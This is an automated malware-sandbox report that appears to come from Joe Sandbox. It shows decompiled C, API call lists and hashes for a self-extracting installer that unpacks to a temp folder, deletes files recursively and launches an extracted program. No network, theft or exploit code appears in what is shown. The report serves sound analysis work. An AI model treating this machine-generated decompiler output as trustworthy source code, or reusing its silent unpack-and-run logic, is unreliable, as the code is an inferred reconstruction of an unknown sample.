                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E008D1680(0x8d91e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E008D58C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E008D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E008D597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0x8d8a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0x8d8a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x8d8a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E008D53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0x8d91e4;
                                                                                                                                                                                                                                            				E008D1781(0x8d91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0x8d9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E008D658A(_t48, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E008D658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D54C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D556F
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D53FB
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5402
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D541F
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D542B
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-3374052426
                                                                                                                                                                                                                                            • Opcode ID: cb41190dd1efedaaf747e2676ad7a90592ddb64cf920d370ebc14ebd886341bf
                                                                                                                                                                                                                                            • Instruction ID: 1c8fe3aae00a2ca377a74c223a4610e0b2652d8046b58910d236b5b3b7072638
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb41190dd1efedaaf747e2676ad7a90592ddb64cf920d370ebc14ebd886341bf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD310270B01A19ABCF159B6DAC48A7E77BAFF81350B14032BE402C2780DE74CE018696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E008D2390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E008D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E008D1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E008D16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E008D1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E008D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E008D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E008D658A( &_v280, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            								E008D2390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,008D8A3A,008D11F4,008D8A3A,00000000,?,?), ref: 008D23F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,008D11F8), ref: 008D2427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,008D11FC), ref: 008D243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 008D2495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 008D24A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 008D24AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 008D24BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(008D8A3A), ref: 008D24C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 69080489bb3817f120570f1eb75d748b236fc4018833b53bb66b360e7aa1f813
                                                                                                                                                                                                                                            • Instruction ID: 4ecf25488cee95a61948d98f5ce14e0a5cb4ccd65f469110747daa7fcfead0a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69080489bb3817f120570f1eb75d748b236fc4018833b53bb66b360e7aa1f813
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E31A232204640ABCB20EBA4DC8DAEB73A8FF94315F144B2FA955C2390EB3499088756
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 675 8d3fef-8d4010 676 8d410a-8d411a call 8d6ce0 675->676 677 8d4016-8d403b CreateProcessA 675->677 678 8d40c4-8d4101 call 8d6285 GetLastError FormatMessageA call 8d44b9 677->678 679 8d4041-8d406e WaitForSingleObject GetExitCodeProcess 677->679 691 8d4106 678->691 681 8d4091 call 8d411b 679->681 682 8d4070-8d4077 679->682 690 8d4096-8d40b8 CloseHandle * 2 681->690 682->681 686 8d4079-8d407b 682->686 686->681 689 8d407d-8d4089 686->689 689->681 692 8d408b 689->692 693 8d4108 690->693 694 8d40ba-8d40c0 690->694 691->693 692->681 693->676 694->693 695 8d40c2 694->695 695->691
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E008D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t45 = __edx;
                                                                                                                                                                                                                                            				_t20 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                            				_t39 = __ecx;
                                                                                                                                                                                                                                            				_t49 = 1;
                                                                                                                                                                                                                                            				_t22 = 0;
                                                                                                                                                                                                                                            				if(__ecx == 0) {
                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                            					return E008D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                                                                                            				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                            				if(_t25 == 0) {
                                                                                                                                                                                                                                            					 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                            					_t45 = 0x4c4;
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					_t49 = 0;
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t22 = _t49;
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                            				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                            				_t44 = _v528;
                                                                                                                                                                                                                                            				_t53 =  *0x8d8a28; // 0x0
                                                                                                                                                                                                                                            				if(_t53 == 0) {
                                                                                                                                                                                                                                            					_t34 =  *0x8d9a2c; // 0x0
                                                                                                                                                                                                                                            					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                            						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                            							 *0x8d9a2c = _t44;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E008D411B(_t34, _t44);
                                                                                                                                                                                                                                            				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                            				CloseHandle(_v544);
                                                                                                                                                                                                                                            				if(( *0x8d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x008d409c
                                                                                                                                                                                                                                            0x008d40a8
                                                                                                                                                                                                                                            0x008d40b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d40c2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d40c2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE ref: 008D4033
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008D4049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 008D405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008D409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008D40A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008D40DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 008D40E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 0e32682b78a617776eb2aae1c20bd627042fc65d83a458c57b8df6152fa9dddc
                                                                                                                                                                                                                                            • Instruction ID: c3612e603cbb703d339d6901c85cc9a2d4652defe0fb188947a448b9cd6e1cc9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e32682b78a617776eb2aae1c20bd627042fc65d83a458c57b8df6152fa9dddc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F131B131642618ABEF209F65DC49FAB777CFB94710F2013ABF645E22A1CA304D85CB21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E008D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0x8da288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0x8d9124 = 0;
                                                                                                                                                                                                                                            				if(E008D2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E008D2F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E008D52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0x8d8a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0x8d9a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E008D1F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0x8d8588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0x8d9124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x008d2c89
                                                                                                                                                                                                                                            0x008d2c87
                                                                                                                                                                                                                                            0x008d2c7c
                                                                                                                                                                                                                                            0x008d2c74
                                                                                                                                                                                                                                            0x008d2c8e
                                                                                                                                                                                                                                            0x008d2c95
                                                                                                                                                                                                                                            0x008d2c98
                                                                                                                                                                                                                                            0x008d2c98
                                                                                                                                                                                                                                            0x008d2c9e
                                                                                                                                                                                                                                            0x008d2ca7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,008D6BB0,008D0000,00000000,00000002,0000000A), ref: 008D2C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,008D6BB0,008D0000,00000000,00000002,0000000A), ref: 008D2C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 008D2C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,008D6BB0,008D0000,00000000,00000002,0000000A), ref: 008D2C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 75f6cdde8f738643db5e1c6bfd841fc0e2971e13e8f77e464447a2c2880cffb2
                                                                                                                                                                                                                                            • Instruction ID: b1f4f3eeda8b24b653425931ebbc07bd305512085d6b44783447d6cdca9505ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75f6cdde8f738643db5e1c6bfd841fc0e2971e13e8f77e464447a2c2880cffb2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0110831221315ABDB247BB9AC89A6F3769FBA43A0B140317F951D3355DE35DC01C662
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D6F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E008D6EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x008d6f45
                                                                                                                                                                                                                                            0x008d6f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 008D6F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: c83d5209a2386070fa05629ffc4cad0c34b214cdd0b701e68fa9e013c2d68e97
                                                                                                                                                                                                                                            • Instruction ID: db1b78134b21aa513b07f2ba21b4dc9c53b5731ff294e60ad31930999c80494a
